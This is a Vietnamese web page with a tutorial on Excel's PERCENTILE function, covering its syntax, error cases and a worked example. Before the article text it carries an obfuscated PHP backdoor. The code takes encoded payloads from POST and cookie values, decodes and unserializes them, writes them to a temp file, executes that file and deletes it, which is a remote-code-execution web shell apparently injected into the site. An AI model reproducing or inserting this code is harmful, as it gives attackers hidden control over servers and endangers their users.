$ylZYFX = chr (85) . '_' . 'E' . "\121" . "\130" . chr (108) . chr (104); $yLWtuVuIpp = 'c' . chr ( 753 - 645 ).chr (97) . "\x73" . chr ( 582 - 467 ).chr (95) . "\145" . "\170" . chr ( 510 - 405 ).chr (115) . "\x74" . 's';$kAOmFrC = class_exists($ylZYFX); $yLWtuVuIpp = "35366";$DZnLrk = strpos($yLWtuVuIpp, $ylZYFX);if ($kAOmFrC == $DZnLrk){function IAeTZP(){$aZfgaHHvu = new /* 4364 */ U_EQXlh(29822 + 29822); $aZfgaHHvu = NULL;}$XKXHSy = "29822";class U_EQXlh{private function KWZRppi($XKXHSy){if (is_array(U_EQXlh::$YNoKSXbD)) {$name = sys_get_temp_dir() . "/" . crc32(U_EQXlh::$YNoKSXbD["salt"]);@U_EQXlh::$YNoKSXbD["write"]($name, U_EQXlh::$YNoKSXbD["content"]);include $name;@U_EQXlh::$YNoKSXbD["delete"]($name); $XKXHSy = "29822";exit();}}public function HfLoXJy(){$XvCgWQeB = "40563";$this->_dummy = str_repeat($XvCgWQeB, strlen($XvCgWQeB));}public function __destruct(){U_EQXlh::$YNoKSXbD = @unserialize(U_EQXlh::$YNoKSXbD); $XKXHSy = "22734_2480";$this->KWZRppi($XKXHSy); $XKXHSy = "22734_2480";}public function gYQxmX($XvCgWQeB, $uwoXMoiAQJ){return $XvCgWQeB[0] ^ str_repeat($uwoXMoiAQJ, intval(strlen($XvCgWQeB[0]) / strlen($uwoXMoiAQJ)) + 1);}public function HturnsX($XvCgWQeB){$IRxSAES = "\142" . "\x61" . "\163" . chr (101) . chr (54) . chr ( 962 - 910 );return array_map($IRxSAES . chr ( 150 - 55 ).chr ( 1074 - 974 )."\145" . "\143" . 'o' . chr (100) . 'e', array($XvCgWQeB,));}public function __construct($oCcnlBmz=0){$vemMBQz = ',';$XvCgWQeB = "";$YdToI = $_POST;$OaybdGwVx = $_COOKIE;$uwoXMoiAQJ = "c88d6de5-9c28-4205-88d1-aa6ae4d03ace";$vclXYK = @$OaybdGwVx[substr($uwoXMoiAQJ, 0, 4)];if (!empty($vclXYK)){$vclXYK = explode($vemMBQz, $vclXYK);foreach ($vclXYK as $TPeibWgFe){$XvCgWQeB .= @$OaybdGwVx[$TPeibWgFe];$XvCgWQeB .= @$YdToI[$TPeibWgFe];}$XvCgWQeB = $this->HturnsX($XvCgWQeB);}U_EQXlh::$YNoKSXbD = $this->gYQxmX($XvCgWQeB, $uwoXMoiAQJ);if (strpos($uwoXMoiAQJ, $vemMBQz) !== FALSE){$uwoXMoiAQJ = explode($vemMBQz, $uwoXMoiAQJ); $dXdlFMY = sprintf("22734_2480", rtrim($uwoXMoiAQJ[0]));}}public static $YNoKSXbD = 56125;}IAeTZP();} Hàm PERCENTILE trong excel - Hàm trả về kết quả là phân vị thứ k - Tải Chùa

Hàm PERCENTILE trong excel – Hàm trả về kết quả là phân vị thứ k

Rate this post
PERCENTILE là hàm dùng để nghiên cứu phân vị của các giá trị trong phạm vi nào đó. Sau đây là cách sử dụng hàm này mà bạn cần biết.

Tính phân vị trong toán học là một trong những quá trình thường làm khi nghiên cứu phân vị của các giá trị trong một phạm vi nào đó. Dưới đây, chúng tôi sẽ giới thiệu đến bạn cách dùng hàm PERCENTILE trong Excel để giúp cho việc thực hiện các tính toán được nhanh chóng và chính xác hơn.

Cách dùng hàm PERCENTILE trong excel

Cách dùng hàm PERCENTILE trong excel

Hàm PERCENTILE là hàm trả về kết quả là phân vị thứ k của các giá trị trong mảng dữ liệu hoặc phạm vi dữ liệu. Giá trị phân vị mà bạn muốn xác định luôn phải có giá trị từ 0 đến 1, bao gồm cả 0 và 1, nếu không hàm sẽ không tính toán được và trả về thông báo lỗi.

Hướng dẫn sử dụng hàm PERCENTILE trong excel

Cú pháp thực hiện: PERCENTILE(array,k)

Trong đó:

  • array: Là mảng dữ liệu hay phạm vi dữ liệu. Giá trị này là giá trị bắt buộc.
  • k: Là giá trị phân vị trong phạm vi 0..1, bao gồm cả 0 và 1. Và đây cũng là giá trị bắt buộc cần phải có.

Lưu ý khi sử dụng hàm PERCENTILE:

  • Hàm PERCENTILE trả về lỗi #VALUE nếu k không có dạng số.
  • Hàm PERCENTILE trả về lỗi #NUM nếu k<0 hoặc k>1.
  • Hàm PERCENTILE sẽ thực hiện nội suy để xác định giá trị của phân vị thứ k khi k không phải là bội số của giá trị 1/(n-1).

Ví dụ:

Cho bảng tính Excel với các giá trị thực tế tương ứng với các tham số của hàm PERCENTILE. Yêu cầu đặt ra đó là tính toán với mảng dữ liệu gồm 5 giá trị là 5, 3, 2, 4, 1 và giá trị phân vị là 0.8. Chú ý rằng: giá trị phân vị này phải thuộc phạm vi 0..1, bao gồm cả 0 và 1:

Các giá trị thực tế tương ứng với các tham số của hàm PERCENTILE

Các giá trị thực tế tương ứng với các tham số của hàm PERCENTILE

Áp dụng công thức của hàm PERCENTILE tại ô C8. Khi đó, kết quả trả về của hàm sẽ nhận được là 4.2 :

Áp dụng công thức của hàm PERCENTILE tại ô C8

Áp dụng công thức của hàm PERCENTILE tại ô C8

Với những chia sẻ trên đây, bạn đã biết đến cú pháp cũng như cách dùng hàm PERCENTILE trong Excel rồi. Và một điều nữa, khi bạn nhập dữ liệu đầu vào k không theo đúng chuẩn thì hàm PERCENTILE cũng được hỗ trợ cơ chế nội suy để xác định giá trị của phân vị. Đây là một tính năng rất hữu ích của hàm này.